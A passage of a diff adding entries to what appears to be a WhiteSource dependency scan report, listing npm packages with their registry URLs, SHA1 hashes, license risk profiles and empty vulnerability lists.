"3.0.0", + "groupId": "spdx-expression-parse", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/spdx-expression-parse/v/3.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "07497bd1-fe4b-48dd-a1cb-a1db4c923d30", + "keyId": 26961558, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/promise/-/promise-7.1.1.tgz", + "homePage": "https://github.com/then/promise", + "genericPackageIndex": "https://www.npmjs.org/package/promise" + }, + "matchType": "SHA1", + "sha1": "489654c692616b8aa55b0724fa809bb7db49c5bf", + "name": "promise-7.1.1.tgz", + "artifactId": "promise-7.1.1.tgz", + "version": "7.1.1", + "groupId": "promise", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ca49265a-7828-44c3-a36d-ebd402b76f39" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c8e1c83c-38b9-4863-842f-0342d6961239", + "keyId": 26967988, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cookiejar/-/cookiejar-2.1.2.tgz", + "homePage": "https://github.com/bmeck/node-cookiejar#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cookiejar" + }, + "matchType": "SHA1", + "sha1": "dd8a235530752f988f9a0844f3fc589e3111125c", + "name": "cookiejar-2.1.2.tgz", + "artifactId": "cookiejar-2.1.2.tgz", + "version": "2.1.2", + "groupId": "cookiejar", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5012a193-11ae-4de9-a969-39331c108806" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e3db2102-11c1-406d-8bbf-40cb92f1893e", + "keyId": 27073455, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/stylis/-/stylis-3.5.4.tgz", + "homePage": "https://github.com/thysultan/stylis.js", + "genericPackageIndex": "https://www.npmjs.org/package/stylis" + }, + "matchType": "SHA1", + "sha1": "f665f25f5e299cf3d64654ab949a57c768b73fbe", + "name": "stylis-3.5.4.tgz", + "artifactId": "stylis-3.5.4.tgz", + "version": "3.5.4", + "groupId": "stylis", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/stylis" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b645f395-63eb-41d8-8419-e82ad03b683a", + "keyId": 27084400, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/debug/-/debug-4.1.1.tgz", + "homePage": "https://github.com/visionmedia/debug#readme", + "genericPackageIndex": "https://www.npmjs.org/package/debug" + }, + "matchType": "SHA1", + "sha1": "3b72260255109c6b589cee050f1d516139664791", + "name": "debug-4.1.1.tgz", + "artifactId": "debug-4.1.1.tgz", + "version": "4.1.1", + "groupId": "debug", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/bbeb6fa9-bf76-470a-9926-cc4bdafcdf11" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "853496a6-eceb-4607-bfcf-d5636020a025", + "keyId": 26954773, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.2.tgz", + "homePage": "https://github.com/tapjs/signal-exit", + "genericPackageIndex": "https://www.npmjs.org/package/signal-exit" + }, + "matchType": "SHA1", + "sha1": "b5fdc08f1287ea1178628e415e25132b73646c6d", + "name": "signal-exit-3.0.2.tgz", + "artifactId": "signal-exit-3.0.2.tgz", + "version": "3.0.2", + "groupId": "signal-exit", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/signal-exit/v/3.0.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "848d98a2-13ce-42c4-960f-e9f608f729f3", + "keyId": 27269604, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jwa/-/jwa-1.4.1.tgz", + "homePage": "https://github.com/brianloveswords/node-jwa#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jwa" + }, + "matchType": "SHA1", + "sha1": "743c32985cb9e98655530d53641b66c8645b039a", + "name": "jwa-1.4.1.tgz", + "artifactId": "jwa-1.4.1.tgz", + "version": "1.4.1", + "groupId": "jwa", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/jwa" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "abed0c82-775a-4096-bfec-c7197b72d0c4", + "keyId": 27300559, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/react-is/-/react-is-16.8.6.tgz", + "homePage": "https://reactjs.org/", + "genericPackageIndex": "https://www.npmjs.org/package/react-is" + }, + "matchType": "SHA1", + "sha1": "5bbc1e2d29141c9fbdfed456343fe2bc430a6a16", + "name": "react-is-16.8.6.tgz", + "artifactId": "react-is-16.8.6.tgz", + "version": "16.8.6", + "groupId": "react-is", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1548ecb8-1b6b-4104-bac2-8a4e97b3c28d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8191ce0f-1d3d-4434-9746-07a66ca37936", + "keyId": 26948480, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "homePage": "https://github.com/TooTallNate/util-deprecate", + "genericPackageIndex": "https://www.npmjs.org/package/util-deprecate" + }, + "matchType": "SHA1", + "sha1": "450d4dc9fa70de732762fbd2d4a28981419a0ccf", + "name": "util-deprecate-1.0.2.tgz", + "artifactId": "util-deprecate-1.0.2.tgz", + "version": "1.0.2", + "groupId": "util-deprecate", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/util-deprecate/v/1.0.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a5989af7-2879-4440-a398-7d523729315e", + "keyId": 26958800, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/colors/-/colors-1.1.2.tgz", + "homePage": "https://github.com/Marak/colors.js", + "genericPackageIndex": "https://www.npmjs.org/package/colors" + }, + "matchType": "SHA1", + "sha1": "168a4701756b6a7f51a12ce0c97bfa28c084ed63", + "name": "colors-1.1.2.tgz", + "artifactId": "colors-1.1.2.tgz", + "version": "1.1.2", + "groupId": "colors", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e9db18df-2f1c-458a-8957-950d27f2cae9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "543512a5-9168-473f-b964-756c2966be5c", + "keyId": 26948785, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz", + "homePage": "https://github.com/maxogden/concat-stream#readme", + "genericPackageIndex": "https://www.npmjs.org/package/concat-stream" + }, + "matchType": "SHA1", + "sha1": "904bdf194cd3122fc675c77fc4ac3d4ff0fd1a34", + "name": "concat-stream-1.6.2.tgz", + "artifactId": "concat-stream-1.6.2.tgz", + "version": "1.6.2", + "groupId": "concat-stream", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6f73178e-19fc-40ee-a725-01d1907b8c4d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f88a604a-f86d-41fd-899e-811f2bbb4996", + "keyId": 27134586, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/string-hash/-/string-hash-1.1.3.tgz", + "homePage": "https://github.com/darkskyapp/string-hash#readme", + "genericPackageIndex": "https://www.npmjs.org/package/string-hash" + }, + "matchType": "SHA1", + "sha1": "e8aafc0ac1855b4666929ed7dd1275df5d6c811b", + "name": "string-hash-1.1.3.tgz", + "artifactId": "string-hash-1.1.3.tgz", + "version": "1.1.3", + "groupId": "string-hash", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/string-hash/v/1.1.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "35ce2045-32a3-4d06-807c-60d0ba3c7495", + "keyId": 26978458, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/debug/-/debug-3.2.6.tgz", + "homePage": "https://github.com/visionmedia/debug#readme", + "genericPackageIndex": "https://www.npmjs.org/package/debug" + }, + "matchType": "SHA1", + "sha1": "e83d17de16d8a7efb7717edbe5fb10135eee629b", + "name": "debug-3.2.6.tgz", + "artifactId": "debug-3.2.6.tgz", + "version": "3.2.6", + "groupId": "debug", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/38778144-16cc-4fd2-aaa1-65a795216e1d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "712afb67-c999-4477-a5e4-65376c749f31", + "keyId": 26955068, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/crypto-random-string/-/crypto-random-string-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/crypto-random-string#readme", + "genericPackageIndex": "https://www.npmjs.org/package/crypto-random-string" + }, + "matchType": "SHA1", + "sha1": "a230f64f568310e1498009940790ec99545bca7e", + "name": "crypto-random-string-1.0.0.tgz", + "artifactId": "crypto-random-string-1.0.0.tgz", + "version": "1.0.0", + "groupId": "crypto-random-string", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/770bfa06-65e6-4987-b331-2fead9e7a120" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bd1cbab6-dbf8-46f2-b553-0472e61439d4", + "keyId": 26954962, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "homePage": "https://github.com/broofa/node-mime#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mime" + }, + "matchType": "SHA1", + "sha1": "32cd9e5c64553bd58d19a568af452acff04981b1", + "name": "mime-1.6.0.tgz", + "artifactId": "mime-1.6.0.tgz", + "version": "1.6.0", + "groupId": "mime", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/mime" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b04a4026-f4ca-4eab-a952-abd2eb139fd1", + "keyId": 27176528, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-3.2.0.tgz", + "homePage": "https://github.com/sindresorhus/ansi-escapes#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-escapes" + }, + "matchType": "SHA1", + "sha1": "8780b98ff9dbf5638152d1f1fe5c1d7b4442976b", + "name": "ansi-escapes-3.2.0.tgz", + "artifactId": "ansi-escapes-3.2.0.tgz", + "version": "3.2.0", + "groupId": "ansi-escapes", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ansi-escapes/v/3.2.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4f604fd5-c87b-47c9-bf4c-6993ffeb6263", + "keyId": 26966887, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/find-up/-/find-up-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/find-up#readme", + "genericPackageIndex": "https://www.npmjs.org/package/find-up" + }, + "matchType": "SHA1", + "sha1": "49169f1d7993430646da61ecc5ae355c21c97b73", + "name": "find-up-3.0.0.tgz", + "artifactId": "find-up-3.0.0.tgz", + "version": "3.0.0", + "groupId": "find-up", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/find-up/v/3.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ae6191e0-a9ab-4076-8beb-bd50a6e3b257", + "keyId": 26954627, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "homePage": "https://github.com/chalk/supports-color#readme", + "genericPackageIndex": "https://www.npmjs.org/package/supports-color" + }, + "matchType": "SHA1", + "sha1": "e2e69a44ac8772f78a1ec0b35b689df6530efc8f", + "name": "supports-color-5.5.0.tgz", + "artifactId": "supports-color-5.5.0.tgz", + "version": "5.5.0", + "groupId": "supports-color", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/11ac6b12-6d29-468b-b65e-dc54e1cf5419" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "147fe918-2b09-47ab-80cd-cc1f67d6be92", + "keyId": 26955435, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/indexes-of/-/indexes-of-1.0.1.tgz", + "homePage": "https://github.com/dominictarr/indexes-of", + "genericPackageIndex": "https://www.npmjs.org/package/indexes-of" + }, + "matchType": "SHA1", + "sha1": "f30f716c8e2bd346c7b67d3df3915566a7c05607", + "name": "indexes-of-1.0.1.tgz", + "artifactId": "indexes-of-1.0.1.tgz", + "version": "1.0.1", + "groupId": "indexes-of", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/8279be6c-f2b2-4a36-91c0-2533070e0e8e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1cbdcac2-f54a-4dc5-a895-92b7cf95f711", + "keyId": 26961626, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.1.tgz", + "homePage": "https://github.com/component/merge-descriptors", + "genericPackageIndex": "https://www.npmjs.org/package/merge-descriptors" + }, + "matchType": "SHA1", + "sha1": "b00aaa556dd8b44568150ec9d1b953f3f90cbb61", + "name": "merge-descriptors-1.0.1.tgz", + "artifactId": "merge-descriptors-1.0.1.tgz", + "version": "1.0.1", + "groupId": "merge-descriptors", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3199c50d-8352-4529-a112-07cb63c54865" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3ac440c6-1772-498d-a5d9-2bf26aa1642d", + "keyId": 26948726, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/url-parse-lax/-/url-parse-lax-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/url-parse-lax#readme", + "genericPackageIndex": "https://www.npmjs.org/package/url-parse-lax" + }, + "matchType": "SHA1", + "sha1": "7af8f303645e9bd79a272e7a14ac68bc0609da73", + "name": "url-parse-lax-1.0.0.tgz", + "artifactId": "url-parse-lax-1.0.0.tgz", + "version": "1.0.0", + "groupId": "url-parse-lax", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/url-parse-lax" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5d8e2a5c-50aa-43d2-953d-0ea4a858630a", + "keyId": 27607373, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@ndhoule/keys/-/keys-2.0.0.tgz", + "homePage": "https://github.com/ndhoule/keys", + "genericPackageIndex": "https://www.npmjs.org/package/@ndhoule/keys" + }, + "matchType": "SHA1", + "sha1": "3d64ae677c65a261747bf3a457c62eb292a4e0ce", + "name": "keys-2.0.0.tgz", + "artifactId": "keys-2.0.0.tgz", + "version": "2.0.0", + "groupId": "@ndhoule/keys", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a11a0aec-c587-4c8b-9715-c1d147a8168f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1c454daf-7502-4075-8a64-12a88a609ab1", + "keyId": 27607400, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/unfetch/-/unfetch-4.1.0.tgz", + "homePage": "https://github.com/developit/unfetch", + "genericPackageIndex": "https://www.npmjs.org/package/unfetch" + }, + "matchType": "SHA1", + "sha1": "6ec2dd0de887e58a4dee83a050ded80ffc4137db", + "name": "unfetch-4.1.0.tgz", + "artifactId": "unfetch-4.1.0.tgz", + "version": "4.1.0", + "groupId": "unfetch", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/unfetch/v/4.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a011f9bc-8999-43df-8b7c-d6b6c4b2061a", + "keyId": 27200104, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ci-info/-/ci-info-2.0.0.tgz", + "homePage": "https://github.com/watson/ci-info", + "genericPackageIndex": "https://www.npmjs.org/package/ci-info" + }, + "matchType": "SHA1", + "sha1": "67a9e964be31a51e15e5010d58e6f12834002f46", + "name": "ci-info-2.0.0.tgz", + "artifactId": "ci-info-2.0.0.tgz", + "version": "2.0.0", + "groupId": "ci-info", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ci-info/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fb07c13b-567d-46c2-a5eb-8356825a5af6", + "keyId": 26948592, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/create-error-class/-/create-error-class-3.0.2.tgz", + "homePage": "https://github.com/floatdrop/create-error-class", + "genericPackageIndex": "https://www.npmjs.org/package/create-error-class" + }, + "matchType": "SHA1", + "sha1": "06be7abef947a3f14a30fd610671d401bca8b7b6", + "name": "create-error-class-3.0.2.tgz", + "artifactId": "create-error-class-3.0.2.tgz", + "version": "3.0.2", + "groupId": "create-error-class", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/990ead3c-081d-4731-832c-d6496738d75c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fef91fd8-d304-4ee5-b111-5696e8eec73c", + "keyId": 26955558, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/dot-prop/-/dot-prop-4.2.0.tgz", + "homePage": "https://github.com/sindresorhus/dot-prop#readme", + "genericPackageIndex": "https://www.npmjs.org/package/dot-prop" + }, + "matchType": "SHA1", + "sha1": "1f19e0c2e1aa0e32797c49799f2837ac6af69c57", + "name": "dot-prop-4.2.0.tgz", + "artifactId": "dot-prop-4.2.0.tgz", + "version": "4.2.0", + "groupId": "dot-prop", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7a45673b-399a-453b-a59c-f26341f10f8c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3db16ec0-c5a0-4b4c-b07e-e37f64ee06e4", + "keyId": 26958681, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-plugin-syntax-jsx/-/babel-plugin-syntax-jsx-6.18.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/babel-plugin-syntax-jsx" + }, + "matchType": "SHA1", + "sha1": "0af32a9a6e13ca7a3fd5069e62d7b0f58d0d8946", + "name": "babel-plugin-syntax-jsx-6.18.0.tgz", + "artifactId": "babel-plugin-syntax-jsx-6.18.0.tgz", + "version": "6.18.0", + "groupId": "babel-plugin-syntax-jsx", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/babel-plugin-syntax-jsx" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5df5c681-976a-4978-8317-c5eb466f1156", + "keyId": 26955199, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/encodeurl/-/encodeurl-1.0.2.tgz", + "homePage": "https://github.com/pillarjs/encodeurl#readme", + "genericPackageIndex": "https://www.npmjs.org/package/encodeurl" + }, + "matchType": "SHA1", + "sha1": "ad3ff4c86ec2d029322f5a02c3a9a606c95b3f59", + "name": "encodeurl-1.0.2.tgz", + "artifactId": "encodeurl-1.0.2.tgz", + "version": "1.0.2", + "groupId": "encodeurl", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6ed0d592-59f6-406c-95a6-a7e624c974bc" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9c0d389f-fbeb-4ffb-8b79-850b7399d1cc", + "keyId": 26954910, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/querystring/-/querystring-0.2.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/querystring" + }, + "matchType": "SHA1", + "sha1": "b209849203bb25df820da756e747005878521620", + "name": "querystring-0.2.0.tgz", + "artifactId": "querystring-0.2.0.tgz", + "version": "0.2.0", + "groupId": "querystring", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/Gozala/enchain/License.md" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fa3bd191-c910-43ae-8b36-6f6aaf7f3e85", + "keyId": 26955422, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-1.2.0.tgz", + "homePage": "https://github.com/sindresorhus/mimic-fn#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mimic-fn" + }, + "matchType": "SHA1", + "sha1": "820c86a39334640e99516928bd03fca88057d022", + "name": "mimic-fn-1.2.0.tgz", + "artifactId": "mimic-fn-1.2.0.tgz", + "version": "1.2.0", + "groupId": "mimic-fn", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + 